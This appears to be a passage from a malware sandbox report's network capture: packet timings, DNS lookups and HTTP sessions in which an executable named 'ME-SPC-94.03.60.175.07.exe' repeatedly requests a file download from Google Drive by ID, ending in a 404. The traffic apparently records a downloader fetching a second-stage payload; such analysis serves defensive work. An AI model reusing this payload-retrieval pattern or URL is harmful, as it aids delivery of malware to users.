                                                Dec 16, 2024 18:06:31.961205006 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:31.961283922 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:31.961549997 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:31.961565971 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:33.683372021 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:33.683506012 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:33.684174061 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:33.684181929 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:33.684375048 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:33.684381008 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617559910 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617702961 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.617728949 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617753983 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617775917 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.617784977 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617799997 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.617827892 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.617849112 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.617897034 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.617980003 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:34.618026018 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.756863117 CET49865443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:34.756882906 CET44349865142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:44.941905975 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:44.941952944 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:44.942075014 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:44.942687988 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:44.942712069 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:46.637057066 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:46.637144089 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:46.637788057 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:46.637849092 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:46.639259100 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:46.639272928 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:46.639514923 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:46.639564991 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:46.639884949 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:46.687334061 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:47.560247898 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:47.560338974 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:47.560353994 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:47.560393095 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:47.560595989 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:47.560635090 CET44349896172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:06:47.560686111 CET49896443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:06:47.596682072 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:47.596745968 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:47.596860886 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:47.597140074 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:47.597156048 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:49.292212963 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:49.292292118 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:49.292826891 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:49.292845964 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:49.293114901 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:49.293138027 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:50.239063025 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:50.239154100 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:50.239649057 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:50.239696026 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:50.239703894 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:50.239718914 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:06:50.239737988 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:50.239774942 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:50.239991903 CET49903443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:06:50.240019083 CET44349903142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:00.294996977 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:00.295036077 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:00.295130968 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:00.298475027 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:00.298492908 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.011967897 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.012053967 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.013076067 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.013191938 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015063047 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015069962 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.015419006 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.015573025 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015856028 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.059339046 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924706936 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924846888 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.924859047 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924922943 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.925046921 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.925084114 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.925158978 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.951086044 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951117039 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:02.951183081 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951406002 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951421976 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.650885105 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.650995970 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651519060 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651527882 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.651736975 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651742935 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580539942 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580653906 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580729961 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.580729961 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.580753088 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580809116 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.591310024 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.591335058 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:15.639709949 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.639753103 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:15.639892101 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.640342951 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.640361071 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.334503889 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.334768057 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.335246086 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.335308075 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.337438107 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.337462902 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.337696075 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.337747097 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.338179111 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.379333973 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241579056 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241683006 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241713047 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241805077 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241864920 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241911888 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.242027044 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.265610933 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.265649080 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:18.265723944 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.266042948 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.266057968 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:19.978538036 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:19.978607893 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003499031 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003511906 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:20.003865957 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003870964 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861392975 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861438036 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861454964 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861481905 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861495018 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861521006 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861711979 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861764908 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861773014 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861824989 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862544060 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862572908 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.862581968 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862636089 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:31.889554024 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.889622927 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:31.889717102 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.890191078 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.890208006 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.653410912 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.653675079 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.654140949 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.654251099 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.655790091 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.655796051 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.656017065 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.656112909 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.656414986 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.703332901 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624119043 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624212980 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624224901 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624277115 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624309063 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624351025 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624351025 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624397039 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624418020 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624439001 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624453068 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624486923 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.646197081 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646253109 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:34.646336079 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646569014 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646581888 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496123075 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496218920 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496802092 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496829987 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496984005 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496997118 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443511963 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443623066 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443701982 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443761110 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443859100 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443859100 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443881989 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443938017 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443981886 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.444046021 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.444593906 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.444628954 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:47.477473974 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.477549076 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:47.477637053 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.478095055 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.478110075 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.181323051 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.181391954 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196232080 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196245909 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.196491003 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196496964 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.103425026 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106340885 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106359005 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106410980 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106520891 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106555939 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106751919 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106806040 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106821060 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.138454914 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138495922 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:50.138580084 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138902903 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138916969 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.833661079 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.833745956 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834307909 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834319115 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.834507942 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834515095 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813725948 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813801050 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.813823938 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813864946 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814048052 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.814091921 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814672947 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814701080 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.814759970 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:02.843664885 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.843728065 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:02.843853951 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.844352007 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.844363928 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.583450079 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.583555937 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.584557056 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.584618092 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.602500916 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.602555990 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.603601933 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.603693962 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.617109060 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.663330078 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501080036 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501183033 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.501326084 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.501403093 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501523972 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.521800041 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.521902084 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:05.522032976 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.522284985 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.522319078 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.314270020 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.314486980 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318079948 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318089962 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.318397045 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.318468094 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318993092 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.363322973 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.275755882 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.275924921 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.275955915 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276002884 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276283979 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276330948 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276760101 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276792049 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276840925 CET49991443192.168.2.7142.250.181.1
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 16, 2024 18:05:41.634985924 CET6320053192.168.2.71.1.1.1
                                                Dec 16, 2024 18:05:41.772861004 CET53632001.1.1.1192.168.2.7
                                                Dec 16, 2024 18:05:44.439698935 CET6236253192.168.2.71.1.1.1
                                                Dec 16, 2024 18:05:44.584628105 CET53623621.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 16, 2024 18:05:41.634985924 CET192.168.2.71.1.1.10xf2dfStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                Dec 16, 2024 18:05:44.439698935 CET192.168.2.71.1.1.10x67daStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 16, 2024 18:05:41.772861004 CET1.1.1.1192.168.2.70xf2dfNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                Dec 16, 2024 18:05:44.584628105 CET1.1.1.1192.168.2.70x67daNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                • drive.google.com
                                                • drive.usercontent.google.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749751172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:05:43 UTC216OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                2024-12-16 17:05:44 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:05:44 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-AKDdjYNe8LJsntZYyFplEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749760142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:05:46 UTC258OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                2024-12-16 17:05:47 UTC2219INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC4AGVAA5_WWVNHbntxDjCPkIOu4s7cmQsXxk7QPYvsNqT9WD6FWjTvEmuyHDoAXwdCW
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:05:46 GMT
                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                Cross-Origin-Opener-Policy: same-origin
